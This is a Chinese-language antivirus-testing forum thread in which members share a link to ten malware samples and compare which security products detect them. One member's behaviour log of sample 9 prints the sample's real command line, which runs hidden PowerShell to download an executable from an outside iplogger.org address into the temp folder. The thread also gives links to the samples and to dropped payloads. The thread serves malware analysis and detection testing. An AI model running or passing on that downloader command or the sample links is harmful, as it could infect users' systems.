EXE样本10X_2

www-tekeze

RT，想双击自己改后缀，风险自负。。   



载点：https://www.lanzous.com/i64uuuf    密码：infected

小岛花六

清除4个，6个上报AI

FD丶纸鸢

卡巴剩下的几个打算双击

小岛花六

FD丶纸鸢 发表于 2019-9-12 15:27
卡巴剩下的几个打算双击

祝你好运

FD丶纸鸢

samp4释放了几个文件 运行两分钟卡巴未报毒 系统未见异常现象 提取衍生物打包上传（https://www.lanzous.com/i64v5fg

samp6就是传奇的释放器 没什么问题

samp9调用了powershell 卡巴仍然miss  将会详细分析

evans168

Norton 剩樣8沒殺

FD丶纸鸢

samp9的exeinfope信息（图1
运行samp9后感觉打开网页速度慢了些 不知道是不是心理作用


使用file analysis分析 结果如下：

1. 15:35:49[1]：(允许)程序启动：File_Analysis 行为记录成功开启   规则版本：2.9.0.0
   
2. 
   
3. 15:35:49[2]：(允许)载入动态链接库：api-ms-win-core-synch-l1-2-0
   
4. 
   
5. 15:35:49[3]：(允许)字符串3：api-ms-win-core-synch-l1-2-0
   
6. 
   
7. 15:35:49[4]：(允许)字符串3：C:\Windows\system32
   
8. 
   
9. 15:35:49[5]：(允许)字符串3：C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL
   
10. 
    
11. 15:35:49[6]：(允许)映射动态链接库：ntdll.dll
    
12. 
    
13. 15:35:49[7]：(允许)加载库文件：ntdll.dll     函数名：NtOpenKey
    
14. 
    
15. 15:35:49[8]：(允许)字符串3：Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    
16. 
    
17. 15:35:49[9]：(允许)字符串3：C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL
    
18. 
    
19. 15:35:49[10]：(允许)字符串3：C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL\
    
20. 
    
21. 15:35:49[11]：(允许)内联文件路径：C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL\
    
22. 
    
23. 15:35:49[12]：(允许)内联文件路径：C:\Windows\system32\
    
24. 
    
25. 15:35:49[14]：(允许)内联文件路径：C:\Windows\
    
26. 
    
27. 15:35:49[16]：(允许)字符串3：\\.\MountPointManager
    
28. 
    
29. 15:35:49[17]：(允许)内联文件路径：\\.\MountPointManager
    
30. 
    
31. 15:35:49[18]：(允许)字符串3：Windows
    
32. 
    
33. 15:35:49[19]：(允许)字符串3：SysWOW64
    
34. 
    
35. 15:35:49[20]：(允许)加载库文件：ntdll.dll     函数名：InitializeCriticalSectionEx
    
36. 
    
37. 15:35:49[21]：(允许)载入动态链接库：api-ms-win-core-fibers-l1-1-1
    
38. 
    
39. 15:35:49[22]：(允许)字符串3：api-ms-win-core-fibers-l1-1-1
    
40. 
    
41. 15:35:49[23]：(允许)字符串3：C:\Windows\system32
    
42. 
    
43. 15:35:49[24]：(允许)载入动态链接库：kernel32
    
44. 
    
45. 15:35:49[25]：(允许)字符串3：kernel32
    
46. 
    
47. 15:35:49[26]：(允许)字符串3：C:\Windows\system32
    
48. 
    
49. 15:35:49[27]：(允许)加载库文件：kernel32     函数名：FlsAlloc
    
50. 
    
51. 15:35:49[28]：(允许)加载库文件：kernel32     函数名：FlsSetValue
    
52. 
    
53. 15:35:49[29]：(允许)载入动态链接库：api-ms-win-core-synch-l1-2-0
    
54. 
    
55. 15:35:49[30]：(允许)字符串3：api-ms-win-core-synch-l1-2-0
    
56. 
    
57. 15:35:49[31]：(允许)字符串3：C:\Windows\system32
    
58. 
    
59. 15:35:49[32]：(允许)加载库文件：api-ms-win-core-synch-l1-2-0     函数名：InitializeCriticalSectionEx
    
60. 
    
61. 15:35:49[33]：(允许)载入动态链接库：api-ms-win-core-fibers-l1-1-1
    
62. 
    
63. 15:35:49[34]：(允许)字符串3：api-ms-win-core-fibers-l1-1-1
    
64. 
    
65. 15:35:49[35]：(允许)字符串3：C:\Windows\system32
    
66. 
    
67. 15:35:49[36]：(允许)载入动态链接库：kernel32
    
68. 
    
69. 15:35:49[37]：(允许)字符串3：kernel32
    
70. 
    
71. 15:35:49[38]：(允许)字符串3：C:\Windows\system32
    
72. 
    
73. 15:35:49[39]：(允许)加载库文件：kernel32     函数名：FlsAlloc
    
74. 
    
75. 15:35:49[40]：(允许)加载库文件：kernel32     函数名：FlsGetValue
    
76. 
    
77. 15:35:49[41]：(允许)加载库文件：kernel32     函数名：FlsSetValue
    
78. 
    
79. 15:35:49[42]：(允许)载入动态链接库：api-ms-win-core-localization-l1-2-1
    
80. 
    
81. 15:35:49[43]：(允许)字符串3：api-ms-win-core-localization-l1-2-1
    
82. 
    
83. 15:35:49[44]：(允许)字符串3：C:\Windows\system32
    
84. 
    
85. 15:35:49[45]：(允许)加载库文件：api-ms-win-core-localization-l1-2-1     函数名：LCMapStringEx
    
86. 
    
87. 15:35:49[46]：(允许)映射动态链接库：kernel32.dll
    
88. 
    
89. 15:35:49[47]：(允许)加载库文件：kernel32.dll     函数名：FlsAlloc
    
90. 
    
91. 15:35:49[48]：(允许)加载库文件：kernel32.dll     函数名：FlsFree
    
92. 
    
93. 15:35:49[49]：(允许)加载库文件：kernel32.dll     函数名：FlsGetValue
    
94. 
    
95. 15:35:49[50]：(允许)加载库文件：kernel32.dll     函数名：FlsSetValue
    
96. 
    
97. 15:35:49[51]：(允许)加载库文件：kernel32.dll     函数名：InitializeCriticalSectionEx
    
98. 
    
99. 15:35:49[52]：(允许)加载库文件：kernel32.dll     函数名：InitOnceExecuteOnce
    
100. 
     
101. 15:35:49[53]：(允许)加载库文件：kernel32.dll     函数名：CreateEventExW
     
102. 
     
103. 15:35:49[54]：(允许)加载库文件：kernel32.dll     函数名：CreateSemaphoreW
     
104. 
     
105. 15:35:49[55]：(允许)加载库文件：kernel32.dll     函数名：CreateSemaphoreExW
     
106. 
     
107. 15:35:49[56]：(允许)加载库文件：kernel32.dll     函数名：CreateThreadpoolTimer
     
108. 
     
109. 15:35:49[57]：(允许)加载库文件：kernel32.dll     函数名：SetThreadpoolTimer
     
110. 
     
111. 15:35:49[58]：(允许)加载库文件：kernel32.dll     函数名：WaitForThreadpoolTimerCallbacks
     
112. 
     
113. 15:35:49[59]：(允许)加载库文件：kernel32.dll     函数名：CloseThreadpoolTimer
     
114. 
     
115. 15:35:49[60]：(允许)加载库文件：kernel32.dll     函数名：CreateThreadpoolWait
     
116. 
     
117. 15:35:49[61]：(允许)加载库文件：kernel32.dll     函数名：SetThreadpoolWait
     
118. 
     
119. 15:35:49[62]：(允许)加载库文件：kernel32.dll     函数名：CloseThreadpoolWait
     
120. 
     
121. 15:35:49[63]：(允许)加载库文件：kernel32.dll     函数名：FlushProcessWriteBuffers
     
122. 
     
123. 15:35:49[64]：(允许)加载库文件：kernel32.dll     函数名：FreeLibraryWhenCallbackReturns
     
124. 
     
125. 15:35:49[65]：(允许)加载库文件：kernel32.dll     函数名：GetCurrentProcessorNumber
     
126. 
     
127. 15:35:49[66]：(允许)加载库文件：kernel32.dll     函数名：CreateSymbolicLinkW
     
128. 
     
129. 15:35:49[67]：(允许)加载库文件：kernel32.dll     函数名：GetCurrentPackageId
     
130. 
     
131. 15:35:49[68]：(允许)加载库文件：kernel32.dll     函数名：GetTickCount64
     
132. 
     
133. 15:35:49[69]：(允许)加载库文件：kernel32.dll     函数名：GetFileInformationByHandleEx
     
134. 
     
135. 15:35:49[70]：(允许)加载库文件：kernel32.dll     函数名：SetFileInformationByHandle
     
136. 
     
137. 15:35:49[71]：(允许)加载库文件：kernel32.dll     函数名：GetSystemTimePreciseAsFileTime
     
138. 
     
139. 15:35:49[72]：(允许)加载库文件：kernel32.dll     函数名：InitializeConditionVariable
     
140. 
     
141. 15:35:49[73]：(允许)加载库文件：kernel32.dll     函数名：WakeConditionVariable
     
142. 
     
143. 15:35:49[74]：(允许)加载库文件：kernel32.dll     函数名：WakeAllConditionVariable
     
144. 
     
145. 15:35:49[75]：(允许)加载库文件：kernel32.dll     函数名：SleepConditionVariableCS
     
146. 
     
147. 15:35:49[76]：(允许)加载库文件：kernel32.dll     函数名：InitializeSRWLock
     
148. 
     
149. 15:35:49[77]：(允许)加载库文件：kernel32.dll     函数名：AcquireSRWLockExclusive
     
150. 
     
151. 15:35:49[78]：(允许)加载库文件：kernel32.dll     函数名：TryAcquireSRWLockExclusive
     
152. 
     
153. 15:35:49[79]：(允许)加载库文件：kernel32.dll     函数名：ReleaseSRWLockExclusive
     
154. 
     
155. 15:35:49[80]：(允许)加载库文件：kernel32.dll     函数名：SleepConditionVariableSRW
     
156. 
     
157. 15:35:49[81]：(允许)加载库文件：kernel32.dll     函数名：CreateThreadpoolWork
     
158. 
     
159. 15:35:49[82]：(允许)加载库文件：kernel32.dll     函数名：SubmitThreadpoolWork
     
160. 
     
161. 15:35:49[83]：(允许)加载库文件：kernel32.dll     函数名：CloseThreadpoolWork
     
162. 
     
163. 15:35:49[84]：(允许)加载库文件：kernel32.dll     函数名：CompareStringEx
     
164. 
     
165. 15:35:49[85]：(允许)加载库文件：kernel32.dll     函数名：GetLocaleInfoEx
     
166. 
     
167. 15:35:49[86]：(允许)加载库文件：kernel32.dll     函数名：LCMapStringEx
     
168. 
     
169. 15:35:49[87]：(允许)加载库文件：kernel32.dll     函数名：AreFileApisANSI
     
170. 
     
171. 15:35:49[88]：(允许)载入动态链接库：api-ms-win-core-string-l1-1-0
     
172. 
     
173. 15:35:49[89]：(允许)字符串3：api-ms-win-core-string-l1-1-0
     
174. 
     
175. 15:35:49[90]：(允许)字符串3：C:\Windows\system32
     
176. 
     
177. 15:35:49[91]：(允许)加载库文件：api-ms-win-core-string-l1-1-0     函数名：CompareStringEx
     
178. 
     
179. 15:35:49[92]：(允许)加载库文件：api-ms-win-core-string-l1-1-0     函数名：EnumSystemLocalesEx
     
180. 
     
181. 15:35:49[93]：(允许)载入动态链接库：api-ms-win-core-datetime-l1-1-1
     
182. 
     
183. 15:35:49[94]：(允许)字符串3：api-ms-win-core-datetime-l1-1-1
     
184. 
     
185. 15:35:49[95]：(允许)字符串3：C:\Windows\system32
     
186. 
     
187. 15:35:49[96]：(允许)加载库文件：api-ms-win-core-datetime-l1-1-1     函数名：GetDateFormatEx
     
188. 
     
189. 15:35:49[97]：(允许)加载库文件：api-ms-win-core-datetime-l1-1-1     函数名：GetLocaleInfoEx
     
190. 
     
191. 15:35:49[98]：(允许)加载库文件：api-ms-win-core-datetime-l1-1-1     函数名：GetTimeFormatEx
     
192. 
     
193. 15:35:49[99]：(允许)加载库文件：api-ms-win-core-datetime-l1-1-1     函数名：GetUserDefaultLocaleName
     
194. 
     
195. 15:35:49[100]：(允许)加载库文件：api-ms-win-core-datetime-l1-1-1     函数名：IsValidLocaleName
     
196. 
     
197. 15:35:49[101]：(允许)载入动态链接库：api-ms-win-core-localization-obsolete-l1-2-0
     
198. 
     
199. 15:35:49[102]：(允许)字符串3：api-ms-win-core-localization-obsolete-l1-2-0
     
200. 
     
201. 15:35:49[103]：(允许)字符串3：C:\Windows\system32
     
202. 
     
203. 15:35:49[104]：(允许)加载库文件：api-ms-win-core-localization-obsolete-l1-2-0     函数名：LCIDToLocaleName
     
204. 
     
205. 15:35:49[105]：(允许)加载库文件：api-ms-win-core-localization-obsolete-l1-2-0     函数名：LocaleNameToLCID
     
206. 
     
207. 15:35:49[106]：(允许)载入动态链接库：Shell32.dll
     
208. 
     
209. 15:35:49[107]：(允许)字符串3：Shell32.dll
     
210. 
     
211. 15:35:49[108]：(允许)字符串3：E:\病毒木马分析区\File Analysis\File_safe;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files\Bandizip\
     
212. 
     
213. 15:35:49[109]：(允许)加载库文件：Shell32.dll     函数名：ShellExecuteA
     
214. 
     
215. 15:35:49[110]：(允许)字符串3：File Analysis
     
216. 
     
217. 15:35:49[111]：(允许)字符串3：File_safe
     
218. 
     
219. 15:35:49[112]：(阻止)运行程序：C:\Windows\system32\cmd.exe     命令行：cmd.exe /c start /B powershell -windowstyle hidden -command "&{$fp=$env:tmp + '/myhost.exe';$wc=(new-object Net.WebClient);$wc.DownloadFile('https://iplogger.org/1IYwx',$fp)}"E:\病毒木~1\FILEAN~1\FILE_S~1\Samp(9).exe >> NUL
     
220. 
     
221. 15:35:49[113]：(允许)映射动态链接库：
     
222. 
     
223. 15:35:49[115]：(允许)载入动态链接库：api-ms-win-appmodel-runtime-l1-1-2
     
224. 
     
225. 15:35:49[116]：(允许)字符串3：api-ms-win-appmodel-runtime-l1-1-2
     
226. 
     
227. 15:35:49[117]：(允许)字符串3：C:\Windows\system32
     
228. 
     
229. 15:35:49[118]：(允许)字符串3：E:\病毒木马分析区\File Analysis\File_safe;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files\Bandizip\
     
230. 
     
231. 15:35:49[119]：(允许)获取进程快照：Samp(9).exe     进程PID：5908
     
232. 
     
233. 15:35:49[120]：(允许)程序退出：File_Analysis 行为记录到此为止
     

复制代码

魔盾分析：https://www.maldun.com/analysis/YXNkZmRzZmFkc2YzNzIyNjZkc2Zhc2RmYXNkZg==/

微步分析：https://s.threatbook.cn/report/file/048ff62e4576aeadf87dfd2c360138d7a440bed666fb78b313cf09006f5bd980/?sign=history&env=win7_sp1_enx86_office2013

根据微步分析的记录，发现了释放的文件myhost.exe，判断是powershell下载的payload，卡巴仍然miss，打包上传附件


payload的exeinfope信息：（图2


File Analysis尝试分析payload无果 应该是反调试了 判断是威胁

另外这个样本我想亲自提交给卡巴，请问怎么发邮件会有人回复，之前发过两次没人回（哭了

FD丶纸鸢

@www-tekeze 实体机双击 报告还这么详细 不给发糖吗qwq

www-tekeze

安天报10项实杀6X，剩: 1,2,4,9 。。。无BD管家，Killed 2X 。

www-tekeze

FD丶纸鸢 发表于 2019-9-12 15:32
samp4释放了几个文件 运行两分钟卡巴未报毒 系统未见异常现象 提取衍生物打包上传（https://www.lanzous.co ...

#6是传奇的释放器？样本太多没一一试，智量也不报这个。